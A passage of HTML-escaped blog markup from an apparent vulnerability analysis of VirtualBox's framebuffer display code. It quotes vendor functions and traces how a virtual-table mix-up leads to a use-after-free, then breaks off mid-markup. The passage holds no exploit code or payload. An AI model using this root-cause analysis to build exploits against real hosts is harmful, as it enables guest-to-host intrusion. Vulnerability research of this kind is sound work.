data-line=\"crayon-5b7b3e582f4da978915659-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4da978915659-1\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CrFbDisplayBase<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">setFramebuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CR_FRAMEBUFFER *<\/span><span class=\"crayon-v\">pFb<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4da978915659-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4da978915659-3\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4da978915659-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4da978915659-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mpFb<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4da978915659-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4da978915659-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fbCleanup<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4da978915659-8\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4da978915659-9\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p>We can assume that the code was written with an intention to call fbCleanup() on an object of CrFbDisplayBase type, but the current object type is CrFbDisplayVrdp (remember the virtual table pointer). Hence, instead of call to CrFbDisplayBase::fbCleanup() we call the CrFbDisplayVrdp::fbCleanup() function.<\/p>\n<p><b>Use-After-Free<\/b><br \/> CrFbDisplayVrdp::fbCleanup() calls method fbCleanupRemoveAllEntries() which is implemented in the base class only so we&#8217;ve arrived to CrFbDisplayBase::fbCleanupRemoveAllEntries() which is the root of UAF and the entire vulnerability.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4e0378347646\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> int CrFbDisplayBase::fbCleanupRemoveAllEntries()  {      VBOXVR_SCR_COMPOSITOR_CONST_ITERATOR Iter;      const VBOXVR_SCR_COMPOSITOR_ENTRY *pEntry;        CrVrScrCompositorConstIterInit(CrFbGetCompositor(mpFb), &amp;Iter);        int rc = VINF_SUCCESS;        while ((pEntry = CrVrScrCompositorConstIterNext(&amp;Iter)) != NULL)      {          HCR_FRAMEBUFFER_ENTRY hEntry = CrFbEntryFromCompositorEntry(pEntry);          rc = EntryRemoved(mpFb, hEntry);          if (!RT_SUCCESS(rc))          {              WARN((&#8220;err&#8221;));              break;          }            CrFbVisitCreatedEntries(mpFb, entriesDestroyCb, this);      }        return rc;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e0378347646-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e0378347646-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-1\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CrFbDisplayBase<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">fbCleanupRemoveAllEntries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">VBOXVR_SCR_COMPOSITOR_CONST_ITERATOR <\/span><span class=\"crayon-v\">Iter<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">VBOXVR_SCR_COMPOSITOR_ENTRY *<\/span><span class=\"crayon-v\">pEntry<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">CrVrScrCompositorConstIterInit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">CrFbGetCompositor<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mpFb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">Iter<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VINF_SUCCESS<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pEntry<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CrVrScrCompositorConstIterNext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">Iter<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER_ENTRY <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CrFbEntryFromCompositorEntry<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pEntry<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">EntryRemoved<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mpFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">RT_SUCCESS<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">WARN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;err&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">CrFbVisitCreatedEntries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mpFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">entriesDestroyCb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e0378347646-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e0378347646-24\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0032 seconds] -->  <\/p>\n<p>The loop iterates through all displays and calls EntryRemoved() for each display, where HCR_FRAMEBUFFER_ENTRY is a structure pointer represents a single display. Again, EntryRemoved() is called using CrFbDisplayVrdp virtual table rather than one of CrFbDisplayBase. Skipping an analysis of how the deletion is performed, let&#8217;s analyze what happens when CrFbVisitCreatedEntries is called.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4e5735068250\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> void CrFbVisitCreatedEntries(HCR_FRAMEBUFFER hFb, PFNCR_FRAMEBUFFER_ENTRIES_VISITOR_CB pfnVisitorCb, void *pvContext)  {      HCR_FRAMEBUFFER_ENTRY hEntry, hNext;      RTListForEachSafe(&amp;hFb-&gt;EntriesList, hEntry, hNext, CR_FRAMEBUFFER_ENTRY, Node)      {          if (hEntry-&gt;Flags.fCreateNotified)          {              if (!pfnVisitorCb(hFb, hEntry, pvContext))                  return;          }      }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4e5735068250-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4e5735068250-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-1\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CrFbVisitCreatedEntries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER <\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PFNCR_FRAMEBUFFER_ENTRIES_VISITOR_CB <\/span><span class=\"crayon-v\">pfnVisitorCb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">pvContext<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER_ENTRY <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hNext<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">RTListForEachSafe<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">EntriesList<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hNext<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR_FRAMEBUFFER_ENTRY<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Node<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">Flags<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">fCreateNotified<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">pfnVisitorCb<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hEntry<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pvContext<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4e5735068250-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4e5735068250-12\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>The first argument is the container of all displays, the second is a callback called for each display, and the third is an argument for the callback. This procedure iterates through all the displays and calls the callback. Now look at the callback itself.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4ee095432337\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" 